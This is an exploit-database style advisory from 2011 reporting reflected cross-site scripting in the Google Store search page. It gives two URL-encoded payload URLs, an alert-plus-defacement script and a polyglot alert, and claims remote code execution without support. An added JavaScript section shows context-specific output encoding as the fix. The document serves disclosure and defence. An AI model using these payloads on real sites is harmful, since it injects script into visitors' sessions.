Google Store Cross Site Scripting



EKU-ID: 203 CVE: OSVDB-ID:
Author: Ivan Published: 2011-05-11 Verified: Not Verified


 
 Author(s): Ivan Sanchez 

 Product: Google Store

 Web: http://www.googlestore.com/googlesearch.aspx?category= [1]

 Affected page:
 -------------------
 googlesearch.aspx?

 Exploiting:
 --------------

 http://www.googlestore.com/googlesearch.aspx?category=  XSS & Remote Code Execution

 Real case, only to verify the bug:


http://www.googlestore.com/googlesearch.aspx?category=http://www.googlestore.com/googlesearch.aspx?category=all&q=%3E%3Cscript%3Ealert%28%27Xss%27%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EBy%2BNullcode.com.ar%3C%2Fh1%3E%3C%2Fmarquee%3E&x=20&y=10

http://www.googlestore.com/googlesearch.aspx?category=all&q=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E&x=25">

[2]

 Many Thanks

 Ing. Ivan Javier Sanchez 

 Ivan.Sanchez@nullcode.com.ar 
 http://www.linkedin.com/in/nullcode 

Links:
------
[1] http://www.googlestore.com/googlesearch.aspx?category=
[2] http://www.googlestore.com/googlesearch.aspx?category=all&q=%3E%3Cscript%3Ealert%28%27Xss%27%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EBy%2BNullcode.com.ar%3C%2Fh1%3E%3C%2Fmarquee%3E&x=20&y=10
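
Added example, not part of the original advisory and not the site's code: the first `q` value above probes an HTML context and the second probes quote-delimited JavaScript and attribute contexts, so the fix is output encoding chosen per reflection context. The page template in `render` and all helper names are assumptions; the advisory does not say where `q` was reflected.

```javascript
// Constructed input: the two `q` values from the advisory's URLs, still percent-encoded.
const ADVISORY_Q = [
  "%3E%3Cscript%3Ealert%28%27Xss%27%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EBy%2BNullcode.com.ar%3C%2Fh1%3E%3C%2Fmarquee%3E",
  "%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E",
];

// Form-decode one raw query value the way a server does before using it.
function decodeQ(raw) {
  return new URLSearchParams("q=" + raw).get("q");
}

// HTML text and quoted-attribute context: neutralise markup and both quote types.
function encodeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// JavaScript string-literal context inside an inline <script>: emit \uXXXX for
// every character outside a small allow-list, so quotes, '/', '<', '>' and '-'
// cannot close the literal, close the script element, or open an HTML comment.
function encodeJsString(s) {
  return s.replace(/[^A-Za-z0-9 ,._]/g, (c) =>
    "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0"));
}

// Hypothetical search-results template reflecting `q` in three contexts.
// encode=false reproduces the unencoded reflection the advisory reports.
function render(q, encode) {
  const h = encode ? encodeHtml : (x) => x;
  const j = encode ? encodeJsString : (x) => x;
  return `<input name="q" value="${h(q)}">` +
    `<p>Results for ${h(q)}</p>` +
    `<script>var lastQuery = '${j(q)}';</script>`;
}

// Number of element start tags in the output; the template itself has 3.
function countStartTags(html) {
  return (html.match(/<[a-z][^>]*>/gi) || []).length;
}

for (const raw of ADVISORY_Q) {
  const q = decodeQ(raw);
  console.log(countStartTags(render(q, false)), "tags raw,",
              countStartTags(render(q, true)), "tags encoded");
}
```

A start-tag count above 3 in rendered output means request data reached the page as markup, which makes the same check usable as a regression test for any template that reflects `q`.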